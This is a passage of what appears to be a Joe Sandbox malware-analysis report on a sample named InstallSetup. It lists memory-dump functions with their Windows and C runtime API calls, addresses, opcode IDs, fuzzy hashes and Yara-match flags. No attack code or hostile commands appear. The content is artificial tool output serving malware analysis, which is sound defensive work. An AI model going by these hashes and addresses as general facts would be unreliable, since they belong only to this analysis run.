                                                                                                • Instruction Fuzzy Hash: 4E213672A042049FCF14DF68DD46BAF77B9EF84750B20872AF91093281EF35E90186E0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                • String ID:
                                                                                                • API String ID: 1687354797-0
                                                                                                • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                • Instruction ID: 2c9f06389b3cfce025fabd3ba3e64fa931f09f7e011859d8bf8059e692d2dcad
                                                                                                • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                • Instruction Fuzzy Hash: 94219E72C052089BDF15EBF8D841FDDB7F8AF49315F24405AF000B7292DB348A848665
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,00969038,009669C9,00980907,00000008,00980C6C,?,?,?,?,00963CB2,?,?,0045A064), ref: 0096904F
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0096905D
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00969076
                                                                                                • SetLastError.KERNEL32(00000000,?,00969038,009669C9,00980907,00000008,00980C6C,?,?,?,?,00963CB2,?,?,0045A064), ref: 009690C8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                • Instruction ID: 366b56c0cc0d3a9360a5773c3ee1280d00f2bb21b18da0de8bc66d42fafec465
                                                                                                • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                • Instruction Fuzzy Hash: 46012B362097116EAB3427B4BC89A67278CEB45775B30033AF531912E2EF338C505989
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,EBA5E231), ref: 00428DE8
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                                                                • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,EBA5E231), ref: 00428E61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                                                                • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00944FCA
                                                                                                • int.LIBCPMT ref: 00944FE1
                                                                                                  • Part of subcall function 0094BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0094BFD4
                                                                                                  • Part of subcall function 0094BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0094BFEE
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00944FEA
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0094501B
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00945031
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0094504F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                • Instruction ID: e4404fe4ea40dea1b81c19f97686ba18e8a0acbedd81e6ecb92cfbf6841ae30b
                                                                                                • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                • Instruction Fuzzy Hash: B011CE35D006189BCB25EBA4C812FAE77B4BF84310F65455AF429AB2D2DB749E09CBD0
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                                                • int.LIBCPMT ref: 00404D7A
                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                                                                • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0094C401
                                                                                                • int.LIBCPMT ref: 0094C418
                                                                                                  • Part of subcall function 0094BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0094BFD4
                                                                                                  • Part of subcall function 0094BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0094BFEE
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0094C421
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0094C452
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0094C468
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0094C486
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                • Instruction ID: 172c18073b3c2f7e4bb6e84867c6f656876aeb54f0e0c7e59fe8f212fb12add7
                                                                                                • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                • Instruction Fuzzy Hash: 5511CEB19012189FCB15FBA4C815FED7774BF84710F644559F411AB2A2DF348E05CBA0
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00944E8C
                                                                                                • int.LIBCPMT ref: 00944EA3
                                                                                                  • Part of subcall function 0094BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0094BFD4
                                                                                                  • Part of subcall function 0094BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0094BFEE
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00944EAC
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00944EDD
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00944EF3
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00944F11
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                • Instruction ID: 636cb5ea901e742f8efc9d59b65fcbae5cca971b181ab0e2f766a20f30084b87
                                                                                                • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                • Instruction Fuzzy Hash: C311A9328002299BCB25EBA4D802FAE77B5BF84310F240559F914AB2A2DB749E05CB90
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                                                • int.LIBCPMT ref: 0040C1B1
                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                                                                • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                                                                • int.LIBCPMT ref: 004054FA
                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00405534
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                                                                • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                                                                • int.LIBCPMT ref: 00405596
                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                                                                • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                • int.LIBCPMT ref: 00404C3C
                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                  • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                • String ID: fJ@
                                                                                                • API String ID: 1836011271-3478227103
                                                                                                • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                                                                • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                                                                • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                                                                APIs
                                                                                                • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                                                                • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                • String ID: pScheduler
                                                                                                • API String ID: 3657713681-923244539
                                                                                                • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                                                                • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_catchmake_shared
                                                                                                • String ID: MOC$RCC$v)D
                                                                                                • API String ID: 3472968176-3108830043
                                                                                                • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                • Instruction ID: b15ac1e9cd4c6699c952d7928cc69e2775ba5ecab006e30b010b4ec4e32c6773
                                                                                                • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                • Instruction Fuzzy Hash: 07F0E771A00614DFDB52FF64C40276C3B74AFC5B40B4580A1F884AB362DB799E88CFA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                • Instruction ID: c1e7e0624cb82881d7995dbedbaf8c6d942813dbab0cfd4e17fedabd9e97c217
                                                                                                • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                • Instruction Fuzzy Hash: 7871C1319002569BCB219F58C894AFFBB79EF55350F24062AF416D7291EB708DC1CBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                                                                • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3033488037-0
                                                                                                • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                • Instruction ID: 544097a18744d1d811c06ddd833dd1805e3103f6cc9311df6157ff6904f1cfed
                                                                                                • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                • Instruction Fuzzy Hash: 1C519172A00704EFDB209F69D841B6AB7F9FF95720B148569E80DDB290E775EA01DB80
                                                                                                APIs
                                                                                                  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                • _free.LIBCMT ref: 00430B4F
                                                                                                • _free.LIBCMT ref: 00430B66
                                                                                                • _free.LIBCMT ref: 00430B85
                                                                                                • _free.LIBCMT ref: 00430BA0
                                                                                                • _free.LIBCMT ref: 00430BB7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3033488037-0
                                                                                                • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                                                                • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                • Instruction ID: e7843576f7416e0346bbfaa7c29557f288b5f8d7c2292e217f0e93cfaffbc032
                                                                                                • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                • Instruction Fuzzy Hash: D9419D77A002049BCB24DF7CC981A9EB7E5EF89714F1585A9E919EB381D731ED01CB81
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                                                • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                                                • __alloca_probe_16.LIBCMT ref: 00436922
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                                                • __freea.LIBCMT ref: 0043698E
                                                                                                  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                • String ID:
                                                                                                • API String ID: 313313983-0
